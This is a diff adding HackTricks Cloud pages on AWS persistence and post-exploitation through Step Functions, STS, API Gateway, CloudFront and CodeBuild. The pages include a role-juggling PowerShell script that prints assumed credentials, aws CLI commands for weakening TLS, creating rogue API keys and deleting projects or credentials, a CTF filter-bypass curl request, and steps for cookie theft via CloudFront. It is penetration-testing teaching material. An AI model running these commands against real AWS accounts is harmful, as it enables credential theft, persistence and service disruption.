+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
new file mode 100644
index 0000000000..08cd69c5f3
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
@@ -0,0 +1,2 @@
+# AWS - SSM Perssitence
+
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
new file mode 100644
index 0000000000..0c7b2c9e49
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
@@ -0,0 +1,47 @@
+# AWS - Step Functions Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Step Functions
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %}
+[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md)
+{% endcontent-ref %}
+
+### Step function Backdooring
+
+Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps.
+
+### Backdooring aliases
+
+If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
new file mode 100644
index 0000000000..45549a99e9
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
@@ -0,0 +1,158 @@
+# AWS - STS Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## STS
+
+For more information access:
+
+{% content-ref url="../aws-services/aws-sts-enum.md" %}
+[aws-sts-enum.md](../aws-services/aws-sts-enum.md)
+{% endcontent-ref %}
+
+### Assume role token
+
+Temporary tokens cannot be listed, so maintaining an active temporary token is a way to maintain persistence.
+
+<pre class="language-bash"><code class="lang-bash">aws sts get-session-token --duration-seconds 129600
+
+# With MFA
+aws sts get-session-token \
+    --serial-number &#x3C;mfa-device-name> \
+    --token-code &#x3C;code-from-token>
+
+# Hardware device name is usually the number from the back of the device, such as GAHT12345678
+<strong># SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username
+</strong># Vritual device name is the ARN in AWS, such as arn:aws:iam::123456789012:mfa/username
+</code></pre>
+
+### Role Chain Juggling
+
+[**Role chaining is an acknowledged AWS feature**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), often utilized for maintaining stealth persistence. It involves the ability to **assume a role which then assumes another**, potentially reverting to the initial role in a **cyclical manner**. Each time a role is assumed, the credentials' expiration field is refreshed. Consequently, if two roles are configured to mutually assume each other, this setup allows for the perpetual renewal of credentials.
+
+You can use this [**tool**](https://github.com/hotnops/AWSRoleJuggler/) to keep the role chaining going:
+
+```bash
+./aws_role_juggler.py -h
+usage: aws_role_juggler.py [-h] [-r ROLE_LIST [ROLE_LIST ...]]
+
+optional arguments:
+  -h, --help            show this help message and exit
+  -r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
+```
+
+{% hint style="danger" %}
+Note that the [find\_circular\_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured.
+{% endhint %}
+
+<details>
+
+<summary>Code to perform Role Juggling from PowerShell</summary>
+
+```powershell
+# PowerShell script to check for role juggling possibilities using AWS CLI
+
+# Check for AWS CLI installation
+if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) {
+    Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
+    exit
+}
+
+# Function to list IAM roles
+function List-IAMRoles {
+    aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
+}
+
+# Initialize error count
+$errorCount = 0
+
+# List all roles
+$roles = List-IAMRoles | ConvertFrom-Json
+
+# Attempt to assume each role
+foreach ($role in $roles) {
+    $sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
+    try {
+        $credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
+        if ($credentials) {
+            Write-Host "Successfully assumed role: $($role.RoleName)"
+            Write-Host "Access Key: $($credentials.AccessKeyId)"
+            Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
+            Write-Host "Session Token: $($credentials.SessionToken)"
+            Write-Host "Expiration: $($credentials.Expiration)"
+
+            # Set temporary credentials to assume the next role
+            $env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
+            $env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
+            $env:AWS_SESSION_TOKEN = $credentials.SessionToken
+
+            # Try to assume another role using the temporary credentials
+            foreach ($nextRole in $roles) {
+                if ($nextRole.Arn -ne $role.Arn) {
+                    $nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
+                    try {
+                        $nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
+                        if ($nextCredentials) {
+                            Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
+                            Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
+                            Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
+                            Write-Host "Session Token: $($nextCredentials.SessionToken)"
+                            Write-Host "Expiration: $($nextCredentials.Expiration)"
+                        }
+                    } catch {
+                        $errorCount++
+                    }
+                }
+            }
+
+            # Reset environment variables
+            Remove-Item Env:\AWS_ACCESS_KEY_ID
+            Remove-Item Env:\AWS_SECRET_ACCESS_KEY
+            Remove-Item Env:\AWS_SESSION_TOKEN
+        } else {
+            $errorCount++
+        }
+    } catch {
+        $errorCount++
+    }
+}
+
+# Output the number of errors if any
+if ($errorCount -gt 0) {
+    Write-Host "$errorCount error(s) occurred during role assumption attempts."
+} else {
+    Write-Host "No errors occurred. All roles checked successfully."
+}
+
+Write-Host "Role juggling check complete."
+```
+
+</details>
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/README.md
new file mode 100644
index 0000000000..092b723de6
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/README.md
@@ -0,0 +1,2 @@
+# AWS - Post Exploitation
+
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
new file mode 100644
index 0000000000..405ff5e93a
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
@@ -0,0 +1,185 @@
+# AWS - API Gateway Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## API Gateway
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-api-gateway-enum.md" %}
+[aws-api-gateway-enum.md](../aws-services/aws-api-gateway-enum.md)
+{% endcontent-ref %}
+
+### Access unexposed APIs
+
+You can create an endpoint in [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) with the service `com.amazonaws.us-east-1.execute-api`, expose the endpoint in a network where you have access (potentially via an EC2 machine) and assign a security group allowing all connections.\
+Then, from the EC2 machine you will be able to access the endpoint and therefore call the gateway API that wasn't exposed before.
+
+### Bypass Request body passthrough
+
+This technique was found in [**this CTF writeup**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp).
+
+As indicated in the [**AWS documentation**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) in the `PassthroughBehavior` section, by default, the value **`WHEN_NO_MATCH`** , when checking the **Content-Type** header of the request, will pass the request to the back end with no transformation.
+
+Therefore, in the CTF the API Gateway had an integration template that was **preventing the flag from being exfiltrated** in a response when a request was sent with `Content-Type: application/json`:
+
+{% code overflow="wrap" %}
+```yaml
+      RequestTemplates:
+        application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
+```
+{% endcode %}
+
+However, sending a request with **`Content-type: text/json`** would prevent that filter.
+
+Finally, as the API Gateway was only allowing `Get` and `Options`, it was possible to send an arbitrary dynamoDB query without any limit sending a POST request with the query in the body and using the header `X-HTTP-Method-Override: GET`:
+
+{% code overflow="wrap" %}
+```bash
+curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json'  --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'
+```
+{% endcode %}
+
+### Usage Plans DoS
+
+In the **Enumeration** section you can see how to **obtain the usage plan** of the keys. If you have the key and it's **limited** to X usages **per month**, you could **just use it and cause a DoS**.
+
+The **API Key** just need to be **included** inside a **HTTP header** called **`x-api-key`**.
+
+### `apigateway:UpdateGatewayResponse`, `apigateway:CreateDeployment`
+
+An attacker with the permissions `apigateway:UpdateGatewayResponse` and `apigateway:CreateDeployment` can **modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
+
+{% code overflow="wrap" %}
+```bash
+API_ID="your-api-id"
+RESPONSE_TYPE="DEFAULT_4XX"
+
+# Update the Gateway Response
+aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RESPONSE_TYPE --patch-operations op=replace,path=/responseTemplates/application~1json,value="{\"message\":\"$context.error.message\", \"malicious_header\":\"malicious_value\"}"
+
+# Create a deployment for the updated API Gateway REST API
+aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
+```
+{% endcode %}
+
+**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
+
+{% hint style="info" %}
+Need testing
+{% endhint %}
+
+### `apigateway:UpdateStage`, `apigateway:CreateDeployment`
+
+An attacker with the permissions `apigateway:UpdateStage` and `apigateway:CreateDeployment` can **modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data**.
+
+{% code overflow="wrap" %}
+```bash
+API_ID="your-api-id"
+STAGE_NAME="Prod"
+
+# Update the API Gateway stage
+aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --patch-operations op=replace,path=/cacheClusterEnabled,value=true,op=replace,path=/cacheClusterSize,value="0.5"
+
+# Create a deployment for the updated API Gateway REST API
+aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
+```
+{% endcode %}
+
+**Potential Impact**: Unauthorized access to cached data, disrupting or intercepting API traffic.
+
+{% hint style="info" %}
+Need testing
+{% endhint %}
+
+### `apigateway:PutMethodResponse`, `apigateway:CreateDeployment`
+
+An attacker with the permissions `apigateway:PutMethodResponse` and `apigateway:CreateDeployment` can **modify the method response of an existing API Gateway REST API method to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
+
+```bash
+API_ID="your-api-id"
+RESOURCE_ID="your-resource-id"
+HTTP_METHOD="GET"
+STATUS_CODE="200"
+
+# Update the method response
+aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true"
+
+# Create a deployment for the updated API Gateway REST API
+aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
+```
+
+**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
+
+{% hint style="info" %}
+Need testing
+{% endhint %}
+
+### `apigateway:UpdateRestApi`, `apigateway:CreateDeployment`
+
+An attacker with the permissions `apigateway:UpdateRestApi` and `apigateway:CreateDeployment` can **modify the API Gateway REST API settings to disable logging or change the minimum TLS version, potentially weakening the security of the API**.
+
+```bash
+API_ID="your-api-id"
+
+# Update the REST API settings
+aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=replace,path=/minimumTlsVersion,value='TLS_1.0',op=replace,path=/apiKeySource,value='AUTHORIZER'
+
+# Create a deployment for the updated API Gateway REST API
+aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
+```
+
+**Potential Impact**: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information.
+
+{% hint style="info" %}
+Need testing
+{% endhint %}
+
+### `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, `apigateway:CreateUsagePlanKey`
+
+An attacker with permissions `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, and `apigateway:CreateUsagePlanKey` can **create new API keys, associate them with usage plans, and then use these keys for unauthorized access to APIs**.
+
+```bash
+# Create a new API key
+API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')
+
+# Create a new usage plan
+USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --output text --query 'id')
+
+# Associate the API key with the usage plan
+aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY
+```
+
+**Potential Impact**: Unauthorized access to API resources, bypassing security controls.
+
+{% hint style="info" %}
+Need testing
+{% endhint %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
new file mode 100644
index 0000000000..8a7a800b77
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
@@ -0,0 +1,57 @@
+# AWS - CloudFront Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## CloudFront
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-cloudfront-enum.md" %}
+[aws-cloudfront-enum.md](../aws-services/aws-cloudfront-enum.md)
+{% endcontent-ref %}
+
+### Man-in-the-Middle
+
+This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script).
+
+#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket
+
+* **Create** the malicious **function**.
+* **Associate** it with the CloudFront distribution.
+* Set the **event type to "Viewer Response"**.
+
+Accessing the response you could steal the users cookie and inject a malicious JS.
+
+#### scenario 2: MitM where CloudFront is already using a lambda function
+
+* **Modify the code** of the lambda function to steal sensitive information
+
+You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main).
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
new file mode 100644
index 0000000000..d0db82e8c4
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
@@ -0,0 +1,111 @@
+# AWS - CodeBuild Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## CodeBuild
+
+For more information, check:
+
+{% content-ref url="../../aws-services/aws-codebuild-enum.md" %}
+[aws-codebuild-enum.md](../../aws-services/aws-codebuild-enum.md)
+{% endcontent-ref %}
+
+### Check Secrets
+
+If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\
+Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform.
+
+{% content-ref url="../../aws-privilege-escalation/aws-secrets-manager-privesc.md" %}
+[aws-secrets-manager-privesc.md](../../aws-privilege-escalation/aws-secrets-manager-privesc.md)
+{% endcontent-ref %}
+
+### Abuse CodeBuild Repo Access
+
+In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code:
+
+<figure><img src="../../../../.gitbook/assets/image (96).png" alt=""><figcaption></figcaption></figure>
+
+The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**.
+
+An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\
+In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you):
+
+<figure><img src="../../../../.gitbook/assets/image (107).png" alt=""><figcaption></figcaption></figure>
+
+And **change the Buildspec commands to exfiltrate each repo**.
+
+{% hint style="warning" %}
+However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\
+Or does he? Check the next section
+{% endhint %}
+
+### Leaking Access Tokens from AWS CodeBuild
+
+You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with:
+
+```bash
+aws codebuild list-source-credentials
+```
+
+{% content-ref url="aws-codebuild-token-leakage.md" %}
+[aws-codebuild-token-leakage.md](aws-codebuild-token-leakage.md)
+{% endcontent-ref %}
+
+### `codebuild:DeleteProject`
+
+An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project.
+
+```bash
+aws codebuild delete-project --name <value>
+```
+
+**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project.
+
+### `codebuild:TagResource` , `codebuild:UntagResource`
+
+An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
+
+```bash
+aws codebuild tag-resource --resource-arn <value> --tags <value>
+aws codebuild untag-resource --resource-arn <value> --tag-keys <value>
+```
+
+**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+
+### `codebuild:DeleteSourceCredentials`
+
+An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository.
+
+```sql
+aws codebuild delete-source-credentials --arn <value>
+```
+
+**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
